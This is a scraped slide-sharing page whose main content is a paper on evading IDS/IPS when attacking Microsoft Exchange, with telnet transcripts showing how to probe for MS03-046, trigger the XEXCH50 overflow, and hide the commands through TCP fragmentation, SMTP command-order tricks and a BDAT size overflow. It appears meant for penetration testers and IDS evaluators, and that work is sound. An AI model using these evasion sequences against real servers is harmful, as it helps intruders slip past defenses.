1. Security and vulnerability assessment analysis tool - Microsoft.docx1. Security and vulnerability assessment analysis tool - Microsoft.docx
1. Security and vulnerability assessment analysis tool - Microsoft.docx
 
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacksKipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacks
 
Securing Switch Access
Securing Switch Access Securing Switch Access
Securing Switch Access
 
Ecommerce Security
Ecommerce SecurityEcommerce Security
Ecommerce Security
 
Denial of-service-Attack
Denial of-service-AttackDenial of-service-Attack
Denial of-service-Attack
 
[White paper] detecting problems in industrial networks though continuous mon...
[White paper] detecting problems in industrial networks though continuous mon...[White paper] detecting problems in industrial networks though continuous mon...
[White paper] detecting problems in industrial networks though continuous mon...
 
Pass4sure 640-554 Cisco IOS Network Security
Pass4sure 640-554 Cisco IOS Network SecurityPass4sure 640-554 Cisco IOS Network Security
Pass4sure 640-554 Cisco IOS Network Security
 
PREDICTIVE DETECTION OF KNOWN SECURITY CRITICALITIES IN CYBER PHYSICAL SYSTEM...
PREDICTIVE DETECTION OF KNOWN SECURITY CRITICALITIES IN CYBER PHYSICAL SYSTEM...PREDICTIVE DETECTION OF KNOWN SECURITY CRITICALITIES IN CYBER PHYSICAL SYSTEM...
PREDICTIVE DETECTION OF KNOWN SECURITY CRITICALITIES IN CYBER PHYSICAL SYSTEM...
 

More from n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Recently uploaded

FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlPeter Udo Diehl
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Product School
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Thierry Lestable
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupCatarinaPereira64715
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesThousandEyes
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...Product School
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Alison B. Lowndes
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxAbida Shariff
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...Product School
 

Recently uploaded (20)

FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
 
Ransomware Mallox [EN].pdf
Ransomware Mallox [EN].pdfRansomware Mallox [EN].pdf
Ransomware Mallox [EN].pdf
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 

Legiment Techniques of IDS/IPS Evasion

  • 1. Legiment Techniques of IPS/IDS Evasion By- Ajit Hatti ajit.hatti.sec@gmail.com Contents : 1. Why learn Evasion Techniques? 2. What is Legiment Technique of IPS/IDS Evasion? 3. The Legiment evasions & the Outcomes. 4. Conclusion. 5. References. 1. Why learn Evasion Techniques Security is Important. As organizations increasing use the internet to take advantage of its global reach, new security controls relating to processes and technologies will need to be deployed and securely managed. The aim of every organization is to derive maximum benefits from its IT infrastructure. However, any IT technology, irrespective of the vendor credentials has known vulnerabilities with new ones being discovered regularly. Further, connecting the IT infrastructure to the Internet brings in a variety of new ones. So security is indispensable to all organizations for smooth & uninterrupted operation without compromising the confidentiality of information assets and resources. Security shouldn’t back fire. Security systems with false positives, affecting the legitimate traffic can cause more harm to business. Security measures should be properly targeted, and directly related to potential impacts, threats, and existing vulnerabilities. Failure to achieve this could result in inadequate security measures and excessive or unnecessary expenditure. An appropriate analysis of security systems in a stream of legitimate traffic can reduce false positives & promotes better targeting of security measures. Attack is the best defense. The need of the hour is proactive security management involving active analysis of the security systems and plug the known and new vulnerabilities before they can be used to cause serious damage. Bottom Line Its evident that security is a moving target. As more and more enterprise are deploying the security systems Like IPS/IDS, these security systems needs continuous evaluation with newer exploitation techniques. In this paper we look at some classical IPS/IDS evasion techniques and their limitations. Then we see how Legiment Techniques of Evasion proves effective compared to the classical once.
  • 2. 2. What is Legiment Technique of IPS/IDS Evasion. The term Legiment Evasion is derived from the 2 terms below : Legement : Ledgment Ledg"ment (-ment), n. (Arch.) (a) A string-course or horizontal suit of moldings, such as the base moldings of a building. --Oxf. Gloss. (b) The development of the surface of a body on a plane, so that the dimensions of the different sides may be easily ascertained. --Gwilt Legilimency : is the magical skill of extracting feelings and memories from another person's mind — a form of magical "mind-reading" -- J.K. Rowling. The Legiment evasion techniques are the one which uses the understanding of the application protocols, the exploit, and the way IDS/IPS handles them. Any existing exploit can be crafted in a way to evade the IPS/IDS if we know about their capabilities or incapabilities. So this technique mainly focuses on the data going over application layer and not below that and hence needs knowledge of the exploit and the server being exploited. In other words - we are applying legilimency to the IPS/IDS boxes or Exploit Legementing, based on IPS/IDS behavior. 3. The Legiment Evasions and The Outcomes I will be explaining the Legiment evasion techniques using2 cases. First - MS03-046, a vulnerability present in Exchange with causes a buffer over flow. A brief intro to MS03-046. Second the flaw in implementation of BDAT command in Exchange. Case 1: MS03-046 XEXCH50 is an exchange command, which accepts 2 parameters, first being the message size. Exchange allocates a buffer of size mentioned in the first parameters and is not handled properly. For a negative value or a value large enough (>231) , Exchange results in Buffer overflow. A typical exploit will send the exchange commands as follows: XEXCH50 -2 1 . Now before we plan to attack and IPS/IDS with MS03-046 exploit, we can do simple test to detect the presence of and IPS/IDS using simple techniques. Send the following command sequence on a mail session. $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at
  • 3. Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] XEXCH50 2 2 354 Send binary data The vulnerable or un-patched server will respond with “354 Send binary data” message where as the patched server will ask for NTLM authentication first. Depending on the response we got from above command sequence, we know whether the target server is vulnerable, we can send the exploit straight away. $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] XEXCH50 -1 2 If our session gets reset, with out an authentication request from the mail server, then it proves the presence of an IPS system in between. Now once we know that we have an IPS/IDS in between, we can choose our evasion techniques. Classical IPS/IDS Evasion techniques 1. TCP level Fragmentation In this technique we split the attack payload into multiple small packets, so that the IDS must reassemble the packet stream to detect the attack. Now we can send the exploits in 2 ways a. Send the fragments with a pause in between hoping that the IDS will time out before the target computer does. Example 1: 1.1 XEX ---> 1.2 CH5 ---> 451 Timeout waiting for client input Connection closed by foreign host. 1.3 TCP/SYN 1.4 0 -1 1.5 2rn Here we have broken “XEXCH50 -1 2rn” over 5 TCP packets. After we send the first to packet we wait for time out, we assume that IDS/IPS in between will time out before the target Exchange Server. Form the 3rd packet onwards it’s a new session and a positive traffic for IPS/IDS, but not for Exchange server.
  • 4. b. Send the above packets out of sequence. As the TCP packets can reach the destination, out of order, and target server reassembles them. But chances are there that IPS/IDS system will not hold the packets for long and pass them on before they reassemble and evaluate it for an exploit in traffic resulting in a bypass. Limitations of Fragmented Evasion: 1. If the IPS/IDS are tuned to keep up a TCP session for the same duration as The exchange does then the fragments can be handled in one session 2. If the IPS/IDS assembles the packet (virtual streaming), then the exploits can be easily intercepted. Legiment Evasion techniques to bypass IDS/IPS 1. The Trick In Exchange, any thing that follows after DATA command is treated as part of the message body & it is not decoded as an SMTP command. With a specially crafted mail, we can easily put IDS maintaining states to decode DATA, even when the protected server is expecting SMTP commands but not DATA. At this moment, if we send the vulnerable SMTP commands to the protected server, our IDS are easily bypassed & server is exploited. IDS/IPS behaviour Analysis Consider the following sesson from a telnet client to a and Exchange Server. $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] MAIL FROM : ajit 250 2.1.0 ajit@TapiServer....Sender OK RCPT TO : varun 250 2.1.5 varun@TapiServer.... DATA 354 Start mail input; end with <CRLF>.<CRLF> FROM : Ajit TO : Varun Subject : MS03-046 Exploit.
  • 5. XEXCH50 -2 1 [Shell Code] If the IDS system raises the alarm for the above traffic, or IPS blocks the above session then it’s a false positive. Because in above session I’m trying to send a mail with the information about the MS03-046 exploit. Any IDS/IPS system triggering for this mail means hampering a false positive which is not acceptable. Now lets assume our IDS wont trigger for the above traffic as it decodes the application traffic and maintain a state machine to differentiate the positive traffic from a real exploit. Then consider the illustrations below. I. Altering the Command Sequence Consider following scenario: $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] MAIL FROM : ajit 250 2.1.0 ajit@TapiServer....Sender OK * DATA 503 5.5.2 Need RCPT command. RCPT TO : ajit 250 2.1.5 ajit@TapiServer //--- Now I can send any Exchange Exploitable command //----and bypass the decoders XEXCH50 -2 1 In above commands sequence, DATA is sent before RCPT TO request. Hence the DATA command fails & whatever follows DATA, our IDS assumes it as a message body and doesn’t look for the vulnerable Exchange Commands in it. Hence the IDS can be easily bypassed. II. Invalid Sender $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] MAIL FROM : invalid_user@localhost 550 5.7.1 invalid_user@localhost... Relaying denied. IP name lookup failed [192.168.86.1]
  • 6. RCPT TO : ajit 503 5.5.2 Need MAIL command. DATA 503 5.5.2 Need MAIL command. MAIL FROM : ajit 250 2.1.0 ajit@TapiServer....Sender OK RCPT TO : ajit 250 2.1.5 ajit@TapiServer //--- Now I can send any Exchange Exploitable command //----and bypass the decoders XEXCH50 -2 1 In above transaction, sender is an user who has no rights to relay from the given SMTP Server & so the MAIL FROM command fails. If the IDS keeps a state check on DATA only after MAIL FROM & RCPT TO commands, even then it can’t stop the above exploit. Because, IDS doesn’t know the MAIL FROM has failed. The IDS will check MAIL FROM & RCPT TO has been send and will assume that DATA coming after this is valid data. The MAIL FROM & RCPT TO after the DATA command will be decoded as HEADERS, and X-EXCH50 as some extended MIME (i.e we will ignore it), But for Server its an exploit. III.Non-Existant Reciepent $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer? Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] MAIL FROM : ajit 250 2.1.0 ajit@TapiServer....Sender OK RCPT TO : non_existant_user@localhost 550 5.7.1 non_existant_user@localhost... Relaying denied. IP name lookup failed [192.168.86.1] DATA 503 5.5.2 Need RCPT command. RCPT TO : ajit 250 2.1.5 ajit@TapiServer //--- Now I can send any Exchange Exploitable command //----and bypass the decoders XEXCH50 -2 1 Above transaction is similar to that of "Invalid Sender". Difference is, this time we are sending mail to a user which doesn’t exist on the server or to which it can’t deliver. Hence the RCPT TO fails. Case 2. Flaw in BDAT There is a flow in the way windows handles the integer overflow. According to RFC-1830, BDAT
  • 7. command accepts <SIZE> parameter in Decimal Number. Exchange accepts the BDAT <SIZE> argument in a signed integer. When we give a <SIZE> string large enough to overflow a signed integer, Exchange spins the number to-and-from between negative and positive value. For instance: BDAT 4294967296 LASTrn Here the size “4294967297” Exchange will cast the effective value of BDAT chunk size as “1”. (for 4294967296 the effective value is 0 and for 4294967298 its 2 and so on) So for the above command any IPS/IDS will be expecting a chunk of size”4294967297”. And in the subsequent “4294967297” bytes it will not try to decode for any vulnerable command, but for Exchange, the chunk size is “1”, and whatever comes after that is a new command. Now here you can add the exploits for vulnerabilities like MS05-021, MS03-046. In this way we can create a simple legiment exploit.bypass 4. Conclusion : More Effective: • These Legiment evasions i.e. the specially crafted mails can bypass all sorts of IPS/IDS (signature based or state based). • If any signature based IPS/IDS can intercept these evasions (without looking to the Server's response), then its bound to give False Positive for any legitimate mail which lists or describes the vulnerable SMTP commands. Tuff to Tackle: • Legiment Evasions are more application specific where as classical evasion techniques are generic and targeted at loopholes in TCP/IP implementations which are easy to patch with the patches available for the host OS on which they are implemented. • IDS/IPS vendors must do Full-Duplex, session state decoding to stop Legiment Evasions. The signature based IPS/IDS will result in Bypass or False Positive. Ease of creation : • The TCP/IP level programming is not required • Changes can be easily incorporated in the existing Exploit frameworks Benefits : • The hackers, PenTesters & the testers of IPS/IDS systems are equally benefited with these methods. Legiment Techniques also encourages us to study the application implementations in bring their flaws in light.